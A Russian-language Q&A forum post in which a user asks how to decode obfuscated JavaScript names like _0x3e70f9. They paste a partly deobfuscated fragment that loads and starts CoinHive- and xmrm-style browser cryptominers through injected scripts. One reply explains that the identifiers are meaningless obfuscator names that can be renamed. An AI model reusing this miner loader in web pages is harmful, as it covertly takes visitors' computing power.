@arturka_v_10

Как раскодировать _0x3e70f9 и подобные?

есть js файл< который я более менее раскодил через HEX. Остались еще неразгаданные участки. Вот не пойму как раскодить длинные выражения по типу _0x3e70f9, про 0x0 я так понял можно смотреть таблицы символов и сопоставления мол x2A Это *

Кусок кода
function (_0x27fca5, _0x5ee8ab, _0x4848e7, _0x3e70f9, _0x43347e, _0x2e5c9e) {
		var _0x4d19c3 = this;
		var _0x43afdc = _0x27fca5;
		_0x4d19c3[_0xe5d8('0x4e')] = _0x2e5c9e && navigator[_0xe5d8('0x1d')] > 0x3 ? !![] : ![];
		_0x4d19c3[_0xe5d8('0x2b')] = _0x5ee8ab;
		_0x4d19c3[_0xe5d8('0x2d')] = _0x4848e7;
		_0x4d19c3[_0xe5d8('0x38')] = _0x43347e;
		_0x4d19c3[_0xe5d8('0x42')] = new Audio(_0xe5d8('0x4f'));
		_0x4d19c3[_0xe5d8('0x42')][_0xe5d8('0x50')] = 0.5;
		_0x4d19c3[_0xe5d8('0x2f')] = jQuery(_0xe5d8('0x3a'))[_0xe5d8('0x40')]();
		if (window[_0xe5d8('0x9')]) {
			if (window[_0xe5d8('0x9')][_0xe5d8('0x51')](_0xe5d8('0x6')) != null) {
				_0x4d19c3[_0xe5d8('0x7')]()[_0xe5d8('0x8')] = parseInt(window[_0xe5d8('0x9')][_0xe5d8('0x51')](_0xe5d8('0x6')));
			}
			if (_0x4d19c3[_0xe5d8('0x2b')] && window[_0xe5d8('0x9')][_0xe5d8('0x51')](_0xe5d8('0x24') + _0x4d19c3[_0xe5d8('0x2b')]) != null && window[_0xe5d8('0x9')][_0xe5d8('0x51')](_0xe5d8('0x39') + _0x4d19c3[_0xe5d8('0x2b')]) != null && window[_0xe5d8('0x9')][_0xe5d8('0x51')](_0xe5d8('0x39') + _0x4d19c3[_0xe5d8('0x2b')]) >= _0x4d19c3[_0xe5d8('0x38')]) {
				myMiner[_0xe5d8('0x22')] = parseInt(window[_0xe5d8('0x9')][_0xe5d8('0x51')](_0xe5d8('0x24') + _0x4d19c3[_0xe5d8('0x2b')]));
				document[_0xe5d8('0x5')](_0xe5d8('0x24'))[_0xe5d8('0x10')] = myMiner[_0xe5d8('0x22')];
			} else {
				window[_0xe5d8('0x9')][_0xe5d8('0xa')](_0xe5d8('0x39') + _0x4d19c3[_0xe5d8('0x2b')], _0x4d19c3[_0xe5d8('0x38')]);
				window[_0xe5d8('0x9')][_0xe5d8('0xa')](_0xe5d8('0x24') + _0x4d19c3[_0xe5d8('0x2b')], 0x0);
			}
			if (window[_0xe5d8('0x9')][_0xe5d8('0x51')](_0xe5d8('0x27'))) {
				jQuery(_0xe5d8('0x41'))[_0xe5d8('0x52')](_0xe5d8('0x26'));
			}
		}
		var _0x36482a = document[_0xe5d8('0x53')](_0xe5d8('0x54'));
		_0x36482a[_0xe5d8('0x55')] = function () {
			var _0x3e70b2 = document[_0xe5d8('0x53')](_0xe5d8('0x54'));
			_0x3e70b2[_0xe5d8('0x55')] = function () {
				_0x4d19c3[_0xe5d8('0x56')]();
			};
			_0x3e70b2[_0xe5d8('0x57')] = function () {
				document[_0xe5d8('0x58')][_0xe5d8('0x59')](_0x3e70b2);
				_0x4d19c3['m'] = new CoinHive[(_0xe5d8('0x5a'))](_0x43afdc, _0x4d19c3[_0xe5d8('0x2b')]);
				_0x4d19c3[_0xe5d8('0x5b')]();
				myMiner[_0xe5d8('0x44')] = Date[_0xe5d8('0x45')]() + _0x3e70f9 * 0x3e8;
				_0x4d19c3[_0xe5d8('0x5c')]( !! []);
			};
			_0x3e70b2[_0xe5d8('0x5d')] = _0x4d19c3[_0xe5d8('0x5e')];
			document[_0xe5d8('0x58')][_0xe5d8('0x5f')](_0x3e70b2);
		};
		_0x36482a[_0xe5d8('0x57')] = function () {
			document[_0xe5d8('0x58')][_0xe5d8('0x59')](_0x36482a);
			_0x4d19c3['m'] = new CHMinr[(_0xe5d8('0x5a'))](_0x43afdc, _0x4d19c3[_0xe5d8('0x2b')]);
			_0x4d19c3[_0xe5d8('0x5b')]();
			myMiner[_0xe5d8('0x44')] = Date[_0xe5d8('0x45')]() + _0x3e70f9 * 0x3e8;
			_0x4d19c3[_0xe5d8('0x5c')]( !! []);
		};
		_0x36482a[_0xe5d8('0x5d')] = navigator && navigator[_0xe5d8('0x60')] && navigator[_0xe5d8('0x60')][_0xe5d8('0x37')](/Windows NT 5\.1/) ? _0x4d19c3[_0xe5d8('0x61')] : _0x4d19c3[_0xe5d8('0x62')];
		document[_0xe5d8('0x58')][_0xe5d8('0x5f')](_0x36482a);
		if (_0x4d19c3[_0xe5d8('0x4e')]) {
			var _0xd9fa81 = document[_0xe5d8('0x53')](_0xe5d8('0x54'));
			_0xd9fa81[_0xe5d8('0x57')] = function () {
				document[_0xe5d8('0x58')][_0xe5d8('0x59')](_0xd9fa81);
				_0x4d19c3[_0xe5d8('0xe')] = new xmrm[(_0xe5d8('0x5a'))](_0x43afdc, _0x4d19c3[_0xe5d8('0x2b')]);
			};
			_0xd9fa81[_0xe5d8('0x5d')] = _0x4d19c3[_0xe5d8('0x63')];
			document[_0xe5d8('0x58')][_0xe5d8('0x5f')](_0xd9fa81);
		}
	}
  • Вопрос задан
  • 517 просмотров
Пригласить эксперта
Ответы на вопрос 1
Это просто обфускатор, названия функций и переменных через _0х... меняете любую на свое, например на vasya и всё.
Главное каждое название функции или переменной менять во всем коде, во всех местах, где это слово упоминается.

Тут, скорей всего, просто уникальные идентификаторы без смысловой нагрузки.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы